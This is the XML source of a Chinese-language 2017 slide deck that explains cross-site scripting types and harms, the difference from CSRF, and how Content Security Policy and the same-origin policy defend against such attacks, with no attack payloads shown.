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9" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="261" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="264" r:id="rId10"/>
    <p:sldId id="265" r:id="rId11"/>
    <p:sldId id="266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D3607-80C4-4EBA-AAC5-9EEB49AF0E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Cross-site scripting 简称 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，其中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是谐音 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cross</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，三大常见的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>程序漏洞之一（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，CSRF跨站请求伪造，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入，另有七种不常见的，一共十种）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>基本原理：利用网站漏洞注入恶意的客户端代码，用户登录网站时浏览器无差别的执行这些恶意的代码。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>危害：窃取用户隐私数据（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cookie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sessionid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）达到突破网站访问权限限制，冒充合法用户的目的；篡改网站内容；引导用户跳转到其他不安全的网站；携带木马。注意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XSS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CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>最大的区别在于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>最根本的目的是用来获取用户的隐私信息，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是诱导欺骗用户完成某种损害自己利益的操作。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>存储型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：把注入型恶意脚本永久的存储于服务器上，在用户浏览页面时被服务器传回并运行。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反射型XSS：将含有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>代码的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>发给合法用户，在用户访问该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>时完成攻击（有时候没有办法把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>保存在被攻击的网站上，但是可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入进去）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基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：其实是反射型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的一种，利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>脚本可以访问并修改整个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>树的能力，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>脚本注入到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对象的方法或属性中，更具隐蔽性。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其实所有类型的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>原理上都是一样的，只是根据攻击方式划分为不同类型，如果不去黑别人也不需要太纠结这些分类。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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工作原理：最根本的工作原理就是限制浏览器信任内容的来源，由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击就是利用浏览器对其请求内容的信任，所以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可以有效防范</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>资源加载限制选项：主要用来限制图片，样式表和脚本资源的来源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URL 限制选项：主要用来限制表单、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>frame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>框架、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>base</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>标签中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，不支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>标签（那太变态了），变相用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>BASE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>标签实现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其他限制选项：其他安全限制，比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不能加载</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>资源，强制将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>资源转换成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，甚至是否允许表单提交，是否可以弹出窗口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可以用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>resphonse header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>配置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，也可以用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>META</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>标签</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>同源策略：不同端口，不同协议，不同域名； document.domain = "company.com";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XHR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XML HTTP REQUEST , </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>WebSockets 在浏览器与服务器之间建立一个全双工的通信信道，如果有了解过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>swoole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的同学应该会对这个东西有印象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EventSource用于接受服务器推送的事件信息主要用于消息推送，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worker脚本是一个异步执行脚本，不会阻塞页面的加载（在此之前为了不让</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>脚本阻塞页面加载，都把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>放在页面最下方</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>），执行完之后通过事件通知页面。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manifest 文件 用来在浏览器本地缓存资源文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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5400000">
            <a:off x="-1696477" y="1696476"/>
            <a:ext cx="6858000" cy="346504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615542" y="1122363"/>
            <a:ext cx="6052457" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="60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15542" y="3602038"/>
            <a:ext cx="6052458" cy="567191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5400000">
            <a:off x="-3236059" y="3240940"/>
            <a:ext cx="6858000" cy="37611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6200000" flipH="1">
            <a:off x="8574942" y="3240940"/>
            <a:ext cx="6858000" cy="376117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5400000">
            <a:off x="-3236059" y="3240940"/>
            <a:ext cx="6858000" cy="37611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6200000" flipH="1">
            <a:off x="8574942" y="3240940"/>
            <a:ext cx="6858000" cy="37611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9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667000" y="0"/>
            <a:ext cx="6858000" cy="344978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552700" y="3449783"/>
            <a:ext cx="7086601" cy="1112691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52700" y="4648197"/>
            <a:ext cx="7086601" cy="99060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5400000">
            <a:off x="-3236059" y="3240940"/>
            <a:ext cx="6858000" cy="37611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6200000" flipH="1">
            <a:off x="8574942" y="3240940"/>
            <a:ext cx="6858000" cy="37611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5400000">
            <a:off x="-1682128" y="1696476"/>
            <a:ext cx="6858000" cy="3465047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615542" y="1122363"/>
            <a:ext cx="6052457" cy="2387600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4614863" y="3602038"/>
            <a:ext cx="6053137" cy="56673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/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4614863" y="4260850"/>
            <a:ext cx="2032000" cy="447675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5400000">
            <a:off x="-3236059" y="3240940"/>
            <a:ext cx="6858000" cy="37611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6200000" flipH="1">
            <a:off x="8574942" y="3240940"/>
            <a:ext cx="6858000" cy="3761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5400000">
            <a:off x="-3236059" y="3240940"/>
            <a:ext cx="6858000" cy="37611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6200000" flipH="1">
            <a:off x="8574942" y="3240940"/>
            <a:ext cx="6858000" cy="37611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tags" Target="../tags/tag12.xml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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2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16.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag14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8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3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140835" y="1122680"/>
            <a:ext cx="6527165" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CSP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>内容安全策略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140200" y="3602355"/>
            <a:ext cx="6527800" cy="567055"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>	—— XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击的基本概念及其防范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887720" y="416941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满鸿 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>月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>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2671763" y="800099"/>
            <a:ext cx="6848475" cy="936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1260447" y="3599998"/>
            <a:ext cx="1531941" cy="115116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TW" sz="6600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>03/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="6600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp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6270819" y="3599998"/>
            <a:ext cx="1531941" cy="115116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TW" sz="6600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>04/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="6600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr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7809464" y="3925386"/>
            <a:ext cx="3122089" cy="825777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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>
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>场景 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>案例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2799092" y="3925386"/>
            <a:ext cx="3122089" cy="825777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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>
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>基本概念</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1260447" y="2170162"/>
            <a:ext cx="1531941" cy="115116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TW" sz="6600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>01/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="6600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6270819" y="2170162"/>
            <a:ext cx="1531941" cy="115116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TW" sz="6600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>02/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="6600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp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7809464" y="2495550"/>
            <a:ext cx="3122089" cy="825777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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>
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击案例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2799092" y="2495550"/>
            <a:ext cx="3122089" cy="825777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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>
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>基本概念</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3765633" y="5029834"/>
            <a:ext cx="1531941" cy="115116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TW" sz="6600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>05/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="6600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5304278" y="5355222"/>
            <a:ext cx="3122089" cy="825777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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>
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
